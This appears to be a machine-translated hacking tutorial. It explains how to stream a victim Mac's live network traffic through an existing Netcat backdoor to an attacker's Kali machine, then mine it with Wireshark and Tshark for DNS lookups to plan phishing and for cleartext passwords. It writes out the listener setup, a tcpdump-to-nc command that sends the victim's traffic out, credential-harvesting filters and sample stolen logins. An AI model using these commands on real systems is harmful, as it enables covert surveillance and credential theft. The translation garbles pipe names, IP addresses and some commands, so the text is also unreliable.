Most users do not know how much valuable data is in their network traffic. With a few simple tools, an attacker can quickly select cookies, passwords, and DNS requests from a MacOS device while hiding the victim's network traffic to the attacker's system. Here we will discuss two methods for parsing packages that flow from a Mac.
The first method requires Wireshark, which was previously treated with zero bytes. However, using Wireshark to parse packets from a remote device in real time may be a novel concept for some readers.
Method two requires Tshark, Wireshark's command line network protocol analyzer. Tshark is great because, unlike Wireshark, which displays everything and only searches thousands of packages, it just prints the information we ask for it. Readers who prefer command-line tools over graphical applications will appreciate Tshark and its simplicity.
I will try to be brief about installing and using Wireshark, as it was presented in zero bytes several times before. So, if you are completely new to Wireshark, it would be a good idea to review all the instructions we have on it, if you want to be proficient with the tool.
By default, Wireshark is included in most versions of Kali Linux. There are some versions that do not contain it, so I'll treat it quickly, as it gets, if you do not see it in your Kali version. First run the following command to make sure that the last tested and curated version (by the Kali developers) is available and download it
apt-get update && apt-get install wireshark Hits: 1 http://archive-7.kali.org/kali kali-rolling InRelease Read package lists ... Done Read package lists ... Done Create dependency structure Read status information ... Done The following packages are being updated: Wireshark 1 updated, 0 reinstalled, 0 removed and 963 not updated. Need 57.2 kb of archives. After this operation, 3.072 B of additional space is used. Get: 1 http://archive-7.kali.org/kali kali- rolling / main amd64 wireshark amd64 2.6.1-1 [57.2 kB] Reached 57.2 kb in 7s (8.296 B / s) Read changelogs ... Done (Reading the database ... 321253 Files and directories are currently installed.) Preparation for unpacking ... / wireshark_2.6.1-1_amd64.deb ... Unpack Wireshark (2.6.1-1) via (2.4.5-1) ... Setting up Wireshark (2.6.1-1) ...
When that's done, Wireshark can be found in the "Sniffing & Spoofing" category in Kali's "Applications" menu.
Step 2: View the data in real time
Instead of storing the packets in a PCAP ( as described in my previous article), we can pipette the data coming from the Netcat tunnel and view it in real time , This can be accomplished with a named pipe and the command mkfifo to redirect the raw packets directly to Wireshark.
In Kali (attacker's system), use the following command to create a named pipe.
mkfifo / tmp / shield
Then launch a Netcat listener and pipe (> ) the output to the pipe called "listening" in the / tmp / directory. The name of the pipe ("listen") is completely arbitrary and can be named arbitrarily. Netcat is listening ( -l ) on port ( -p ) 9999 for incoming connections from the macOS device
nc -l -p 9999> / tmp / Shielding
Now open the wirhark intercept mail file with argument -k to immediately begin capturing packets. The input file ( -i ) should refer to the listening pipe we just created.
wireshark -k -i / tmp / wiretapping
Wireshark opens, but does not show any packets yet. The setup on the attacker's Kali machine is complete at this time.
Now we have to execute the command tcpdump on the MacOS device to instruct him to send us the packages of the victim. From the Netcat backdoor, first use the command ifconfig to get the name of the target's wireless interface.
/ sbin / ifconfig -a lo0: flags = 8049
mtu 16384 Options = 1203 inet 127.0.0.1 Netmask 0xff000000 inet6 :: 1 prefixlen 128 inet6 fe80 :: 1% lo0 prefixlen 64 scopeid 0x1 nd6 options = 201 gif0: flags = 8010 mtu 1280 stf0: flags = 0 <> mtu 1280 EHC29: Flags = 0 <> Mtu 0 EHC26: flags = 0 <> Mtu 0 XHC20: flags = 0 <> Mtu 0 en0: flags = 8863 mtu 1500 Ether e0: b9: ba: c8: bc: c8 inet 192.168.0.133 Netmask 0xffffff00 Broadcast 192.168.0.255 nd6 options = 201 Media: automatic selection Status: Active en1: flags = 8963 mtu 1500 Options = 60 Media: Autoselect Status: inactive bash-3.2 #
The interface with the address "inet" of "192.168.0.133" is the wireless interface of my MacBook. In my case, the name of the interface is "en0", but this may vary depending on the MacOS device and version.
Use the interface ( -i ) argument in the following tcpdump command when sending traffic to the attacker system. In this command, tcpdump will write the captured data directly into the Netcat tunnel ( -w ). The address 188.8.131.52 should be changed to the IP address of the attacker hosting the netcat listener. This can be a local IP address or a remote VPS IP address.
/ usr / sbin / tcpdump -i
-w - | nc 184.108.40.206 9999
As long as both terminals are open, Tcpdump sends real-time network traffic directly to the attacker's system and to Wireshark.
Step 3: Sniff DNS Traffic to Find Phishing Candidates
Unfortunately, today (for hackers) many sites use encryption that prevents sniffer credentials from being learned. Tracking domain name traffic owned by sites that send and receive encrypted data still has benefits. We can learn a lot about a target by analyzing their DNS traffic and preferred sites for future phishing attacks.
To filter DNS transmissions, enter the DNS string in Wireshark's filter bar.
The most popular websites use encryption, but there are still many protocols and Millions of Websites Do not encrypt sensitive data. POST data is likely to contain the most compromising and insightful information. Here we may find usernames, passwords, home addresses, e-mail addresses, social security information, chat logs, and more.
To filter POST data, enter http.request.method == "POST". string in Wireshark's Display Filter Bar
Alternatively, we can use Tshark with the previously created one Stream "/ tmp / shielding" tap. Tshark is not necessarily better than Wireshark . For both tools there are some advantages and disadvantages. Tshark will only show what we ask of it, which means that we can miss some tiny (but valuable) data because we have restricted the display filter to something too fine. Conversely, Wireshark can display too much information and cause us to miss some useful bit data. Once again, pros and cons for both tools.
Tshark is available in the Kali repositories and can be installed with the following command.
apt-get update && apt-get install tshark Hits: 1 http://archive-7.kali.org/kali kali-rolling InRelease Read package lists ... Done Read package lists ... Done Create dependency structure Read status information ... Done Use "apt autoremove" to remove it. The following NEW packages will be installed: tshark 0 updated, 1 newly installed, 0 removed and 945 not updated. Need 186 kB of archives. After this operation, 404 KB of additional space is used. Get: 1 http://archive-7.kali.org/kali kali-rolling / main amd64 tshark amd64 2.6.1-1 [186 kB] Retrieved 186 kB in 7s (27.0 kB / s) Select the previously unselected tshark package. (Reading the database ... 321331 Files and directories are currently installed.) Preparation for unpacking ... / tshark_2.6.1-1_amd64.deb ... Unpack Tshark (2.6.1-1) ... Processing trigger for man-db (2.8.2-1) ... Setting up Tshark (2.6.1-1) ...
Use the following command to dump DNS traffic. We filter out packets on port 53 and DNS queries with the argument dns.qry.name . The Tshark arguments ( -e ) are just like Wireshark's display filters, allowing the use of -T fields .
tshark -i / tmp / listen -f "src port 53" -n -T fields -e dns.qry.name Capturing on & # 39; / tmp / listening & # 39; twitch.tv twitch.tv www.twitch.tv www.twitch.tv linkedin.com linkedin.com www.linkedin.com www.linkedin.com statisch.twitchcdn.net statisch.twitchcdn.net ocsp.digicert.com yahoo.co.jp yahoo.co.jp yahoo.co.jp static.licdn.com www.yahoo.co.jp static.licdn.com www.yahoo.co.jp www.yahoo.co.jp ocsp.cybertrust.ne.jp ocsp.cybertrust.ne.jp office.com www.office.com s.yimg.jp www.office.com www.office.com www.office.com s.yimg.jp s.yimg.jp weuofficehome.msocdn.com statik-uhf-neu.akamaized.net c.microsoft.com c.microsoft.com lpt.c.yimg.jp iwiz-blog-cms.c.yimg.jp
Using this data, we can easily identify a target's favorite sites and begin preparing phishing sites for social engineering attacks.
Step 3: Sniff Passwords with Tshark  Filter POST requests ( http.request.method == POST ) with the string " pass " to find passwords that are sent in clear text. Also, use several fields ( -e ) arguments to print the full URL ( http.request.full_uri ), the POST data key ( urlencoded-form.key ) and their values ( urlencoded-form.value ). The keys help us to understand how the values are formatted. For example, a key could read "username, password" while the corresponding values read "tokyoneon, Pa $$ word321". Below are two examples.
tshark -i / tmp / listen -Y & # 39; http.request.method == POST and tcp contains "pass" & # 39; -T fields -e http.request.full_uri -e urlencoded-form.key -e urlencoded-form.value
Capturing on & # 39; / tmp / listening & # 39;
http://www.website.org/servlet/login? Username, password, rememberme, srv hacker @ nullbyte.com, 123Password321,1,12
http://login.website2.com/?r=75aa94fce9687c7aa43e91d1572a1dbd login, password, login firstname.lastname@example.org, y0u11 n3v3r gU3 $$ MY Pa $$ w0rd !!, Login
tshark -i / tmp / listen -Y & # 39; http.request.method == POST and tcp contains "pass" & # 39; -T fields -e http.request.full_uri -e urlencoded-form.key -e urlencoded-form.value Capturing on & # 39; / tmp / listening & # 39; http://www.website.org/servlet/login? Username, password, rememberme, srv hacker @ nullbyte.com, 123Password321,1,12 http://login.website2.com/?r=75aa94fce9687c7aa43e91d1572a1dbd login, password, login email@example.com, y0u11 n3v3r gU3 $$ MY Pa $$ w0rd !!, Login
Some POST data contains several parameters is more difficult to interpret. Here we see an authentication token followed by the user's email address and password.
tshark -i / tmp / listen -Y & # 39; http.request.method == POST and tcp contains "pass" & # 39; -T fields -e http.request.full_uri -e urlencoded-form.key -e urlencoded-form.value Capturing on & # 39; / tmp / listening & # 39; http://login.website3.com/users/sign_in utf8, authenticity_token, user [email] user [password] commit, user [remember_me] ✓, ji5H6Z6WO + bwup3ey / 3kI2P7 ++ 5t6ptj87y9uTAQ7rw0o4QNP + EAKUVIAW5xCScd60sqPyz8bMj + AoumPIUzQ ==, Hacker @ nullbyte.com, 123Password321 ,, 0 http://login.website3.com/users/sign_in utf8, authenticity_token, user [email] user [password] commit, user [remember_me] ✓, HCsJXi + xDjkOhIXxl + g1JVg4EzKTBBBjIl3YifZ2 + bWmpsq6jsY19rt2GUEtHPYb0IjC49IS58gv4 + 6uXpQDxA ==, Hacker @ nullbyte .com , 123passw0rd321 ,, 0
Tshark and Wireshark are both excellent tools for snooping packets. Readers who also prefer to work in terminals prefer Tshark over Wireshark. For a comprehensive look at display filters, read the official documentation from Wireshark.